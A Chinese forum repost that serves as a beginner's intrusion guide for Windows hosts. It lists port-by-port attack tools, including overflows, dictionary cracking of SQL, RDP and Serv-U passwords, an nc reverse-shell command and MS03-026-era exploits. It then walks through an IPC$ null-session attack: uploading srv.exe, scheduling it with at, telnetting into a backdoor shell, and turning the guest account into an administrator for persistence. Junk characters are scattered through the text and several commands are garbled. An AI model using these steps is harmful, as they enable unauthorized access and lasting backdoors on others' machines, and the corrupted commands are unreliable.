TA的每日心情 | 衰 2019-8-18 09:37 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
: T. M" z$ W V8 C希望对新手入侵有帮助!
# F" H0 j: H: Z- |" t 1. 1433端口入侵
& q( _% \. ^) `! e scanport.exe 查有1433的机器- j- ?+ ^- d$ [4 z- z$ Y& W
SQLScanPass.exe 进行字典暴破(字典是关键)
4 O9 X3 S* [* [. f& M& h 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。8 [7 m0 ^' i# T) }9 Y$ k
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口( e% c/ A0 H+ y7 }
(以上反向的,测试成功); p6 |% v: E$ B: z5 g# n; n
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
1 i& U$ w9 I8 e+ t. X. W 2. 4899端口入侵
( v& k0 k& q7 U 用4899过滤器.exe,扫描空口令的机器
* I" H$ {" z( I7 Q 3. 3899的入侵1 h: w- R R% P7 l% _
对很早的机器,可以试试3389的溢出(win3389ex.exe)
4 ~+ B+ n& ~3 w 对2000的机器,可以试试字典暴破。(tscrack.exe)) |& J: k$ P g" B" z
4. 80入侵2 w. q( t- A3 ?+ u* d
对sp3以前的机器,可以用webdav入侵;
P! H8 s k* D 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)* i! S/ X9 c: z
可以利用SQL进行注入。(啊D的注入软件)。( j D& s5 K/ }. N7 @! p) ^ I
5. serv-u入侵(21端口)
4 a' P# X/ g, H+ M' i/ n 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
. i- j3 V. M8 P" u3 Q/ E, X 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
4 n2 @" p" W9 u( p9 Z 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
+ S/ [; m( C4 b( o1 E 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
: G# N0 O4 e7 l: V" ?* f 6. 554端口
& _# b! B0 ?: U8 w: t, w6 X 用real554.exe入侵。/ H2 u' J0 |9 i u2 [! f
7. 6129端口
( n2 {# k8 g+ _2 \- z/ X4 N W 用DameWare6129.exe入侵。% G5 [, a- Q* a" Q
8. 系统漏洞4 j& W' |1 N: N: h+ q/ Q X" a) B" i
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。) _( X- o+ x- ]/ N6 K6 k$ @! s: o
9. 3127等端口
, |" ?6 q" s& X9 ^2 T. u
+ I5 v6 Q& c# E+ b' Z: F 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。2 S0 _) ?( q6 U2 E; ~: L
10. 其他入侵$ D5 h; p2 F: N1 ?) ]: |
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。, q3 F! z1 ]# {% V- e0 Z
* d( _2 q% S# V8 Y5 A0 y( ]
经典IPC$入侵
$ {; W* {6 l; c, r( ]" b
1 k- q7 h+ } }" J 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"( J7 z& n$ n: c. O4 m# c
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
0 l/ {9 o0 k9 T1 X3 @+ s8 s' i 2. C:\>copy srv.exe $">\\127.0.0.1\admin$
$ ^& J2 C8 x+ j7 z 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
6 c1 _) s1 Y; i" V' |# y, [8 V 3. C:\>net time file://127.0.0.1/! c! \2 |7 b8 U% V+ m) v6 @
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。+ P& Q$ Z! a8 c. U$ q+ {4 F0 x4 Z7 |
4. C:\>at file://127.0.0.1/ 11:05 srv.exe! J& E" @) E* L) b+ \) D
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
3 }# M4 a/ b' J# ?" F- H 5. C:\>net time file://127.0.0.1/
5 R) _6 }( ]& ?. \ 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
% v! B8 L$ e: m3 z, A' J& w* T) U 6. C:\>telnet 127.0.0.1 99
! ?9 `4 X$ g1 A; N( t8 B4 w 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
" h8 G: L- v8 w' s+ N3 [ 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
4 O' ~) t" N( R! v4 ?8 K [ 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$. V T) A( n* t# D/ W
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。/ W' v, H9 C" o8 k, K& X
8. C:\WINNT\system32>ntlm) Q. \$ y6 L8 w2 r7 c f( X; `( F
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!: r6 ^1 [+ m- \+ N4 E/ x& D
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组$ X: V: m& v" u
10. C:\>net user guest /active:yes4 ~' ]& D j8 h+ A! h. Z
将对方的Guest用户激活$ p4 W! p! A/ Y% C
11. C:\>net user guest 1234
2 p, K- n- N: A0 ]" T2 e1 | 将Guest的密码改为1234,或者你要设定的密码0 D) ?2 S( m! @ X4 E" [
12. C:\>net localgroup administrators guest /add
7 P5 D) o! c1 m, [" _ c" w2 p, I 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|